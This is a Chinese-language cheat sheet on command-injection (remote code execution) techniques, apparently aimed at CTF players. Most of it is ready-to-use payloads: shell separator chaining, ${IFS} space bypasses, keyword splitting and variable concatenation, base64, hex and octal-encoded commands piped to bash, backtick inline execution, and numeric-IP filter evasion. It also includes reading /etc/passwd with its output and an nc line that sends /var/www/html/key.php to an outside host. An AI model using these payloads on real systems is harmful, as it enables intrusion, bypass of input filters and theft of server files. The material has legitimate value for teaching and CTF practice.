远程代码执行漏洞
0x00:管道符、命令执行函数
0x01:管道符
一、“;”分号用法
方式:command1 ; command2
二、“| ”符号用法
方式:command1 | command2
# rpm -qa|grep licq
# cat /etc/passwd | grep /bin/bash | wc -l
三、“&”符号用法
ctf 中用法 ping 127.0.0.1 & ls(先执行 ls ,后执行 ping)
方式:command1 &
四、“&&”符号用法
ping 127.0.0.1 && ls(ping 命令正确才执行 ls ,要是 ping 1 && ls ,ls 就不会执行)
command1 && command2 [&& command3 ...]
五、“||”符号用法
和&&相反——左边为假才执行命令二
command1 || command2 [|| command3 ...]
举例,ping 命令判断存活主机
ping -c 1 -w 1 192.168.1.1 &> /dev/null && result=0 ||result=1
if [ "$result" == 0 ];then
echo "192.168.1.1 is UP!"
else
echo "192.168.2.1 is DOWN!"fi
六、空格绕过
linux 操作系统
不是百分百成功的
以下两种成功率极高————${IFS}和$IFS$9都可代替空格,但是后者更好,前者的大括号大概率会被过滤
cat${IFS}flag.txt
cat$IFS$9flag.txt
{cat,flag.txt}
cat<flag.txt
cat<>flag.txt
ca\t fl\ag
kg=$'\x20flag.txt'&&cat$kg
\x20 转换成字符串就是空格,这里通过变量的方式巧妙绕过%20是URL编码,URL是给浏览器看的,不是给服务器看的,所以URL编码不能解析
windows操作系统
type.\flag.txt
type,flag.txt
echo,123456
七、通配符绕过
1、问号 ? ——单个字符
cat 等命令不能使用 ? 通配符去匹配如果要模糊匹配,在前面指定目录/bin/c?t即可,bin也可以使用?,但cat不能全为问号,因为三个字母的单词目录很多
2、星号 * ——多个字符
3、内联执行——通杀技巧
target=127.0.0.1;echo"flag{qeuiwqhdjbcoeihoehwuifwoewo}">>flag.php
上述语句意为在当前目录下新建一个文件,内容为flag{qeuiwqhdjbcoeihoehwuifwoewo},重定向至flag.php
执行后,当前目录就会多一个flag.php,然后127.0.0.1;cat flag.php 就会显示flag{qeuiwqhdjbcoeihoehwuifwoewo}
内联执行操作为——target=127.0.0.1;cat `ls`,执行后flag会直接出来:cat查看文件,ls列出当前目录下的所有文件,一整个操作就是查看当前目录的所有文件,所以就会显示flag.php和index.php,在CTF,等级考试等中,都会有奇效——反引号位于左上角tab键上方
参考链接: 网络地址转化为数字地址网络地址有另外一种表示形式,就是数字地址比如 127.0.0.1 可以转化为2130706433, 可以直接访问 http: //2130706433 或者 http: //0x7F000001, 这样就可以绕过 . 的ip过滤
八、权限读取问题
1、注释符
2、查看文件的权限赋予权限
l's' -la ——查看文件是否有读权限,同时绕过关键字限制
c'h'm'o'd +777 /filename
- cat:由第一行开始显示内容,并将所有内容输出
- tac:从最后一行倒序显示内容,并将所有内容输出
- more:根据窗口大小,一页一页的现实文件内容
- less:和 more 类似,但其优点可以往前翻页,而且进行可以搜索字符
- head:只显示头几行
- tail:只显示最后几行
- nl:类似于 cat -n,显示时输出行号
- tailf:类似于 tail -f
- sort%20/flag:读文件
- dir:来查看当前目录文件
九、REC花式读取文件内容
1、static-sh
static-sh ./flag.txt
./flag.txt: line 1: flag{this_is_a_test}: not found
2、paste ——复制
paste ./flag.txt /etc/passwd
flag{this_is_a_test} root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
3、diff ——区别
diff ./flag.txt /etc/passwd
1c1,45
< flag{this_is_a_test}
\ No newline at end of file
---
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
4、od ——16进制读取
od -a ./flag.txt -a 将od十六进制的内容自动进行解码
flag { this_is_a_test }
5、bzmore
bzmore ./flag.txt
------> ./flag.txt <------
flag{this_is_a_test}
6、bzless
bzless ./flag.txt
echo 'bzless ./flag.txt'
------> ./flag.txt <------ flag{this_is_a_test}
7、curl ——回显前端页面
curl file:///home/coffee/flag 可处理file协议和http协议
curl命令要指定根目录///flag,file协议后面只能跟绝对路径,pwd命令会显示当前路径
8、nc
nc 10.10.10.10 4444 < /var/www/html/key.php
接受机:
nc -l 4444 > key.txt
9、wget
使用方法——get url -P path
1、空格过滤
2、 一些命令分隔符
linux 中:%0a 、%0d 、; 、& 、| 、&&、||windows 中:%0a、&、|、%1a(一个神奇的角色,作为.bat 文件中的命令分隔符)
3、绕过空格
①、$IFS ,${IFS} ,$IFS$1,//$1
有时会禁用 cat解决方法是使用 tac 反向输出命令: linux 命令中可以加 \,所以甚至可以 ca\t /fl\ag , 过滤了 bash 可以用 sh echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh拼接 flag 1;a=fl;b=ag.php;cat $a$b
其中有这么一条过滤方法,我们用上述方法无法绕过,但是我们只要改变一下顺序就可以:
②、拼接绕过
a=ag.php;b=fl;cat $b$a ,拼接完成之后就相当于cat flag,读取根目录下的flag,可以在 fl 前加 /
绕过空格就用上面提到的方法
$IFS$1 完整的 payload 1;a=ag.php;b=fl;cat$IFS$1$b$a
else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}
③、内联执行绕过
④、编码绕过
Hackerbar不能在Post Data里面直接进行base64编码,要放到 load框里面编码完之后再放回Post Data里
base64:
echo YWJjZGU=|base64 -d //打印出来 abcde
echo Y2F0IGZhbGcucGhw|base64 -d|bash //cat flag.php
//先把cat flag.php进行编码,然后base64 -d进行解码,bash是Linux的shell命令,但不是每个都有bash
//如果没有bash的话,可以换sh执行
echo Y2F0IGZhbGcucGhw|base64 -d|sh //cat flag.php
hex:
echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.phpoct:
$(printf “\154\163”) //ls
$(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat
flag.php
Windows系列支持的管道符
- |:直接执行后面的语句,例如:
ping 127.0.0.1|whoami
- ||:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假。例如
ping 2||whoami
- &:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。例如:
ping 127.0.0.1&whoami
- &&:如果前面的语句为假直接出错,也不执行后面的语句,前面的语句只能为真。例如:
ping 127.0.0.1&&whoami
Linux系统支持的管道符
- ; :无论前面真假,执行完前面的语句再执行后面的。例如:ping
127.0.0.1;whoami
- |:显示后面语句执行的结果,例如:
ping 127.0.0.1|whoami
- ||:当前面执行的语句出错时,执行后面的语句。例如
ping 1||whoami
- &:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。例如:
ping 127.0.0.1&whoami
- &&:如果前面的语句为假直接出错,也不执行后面的语句,前面的语句只能为真。例如:
ping 127.0.0.1&&whoami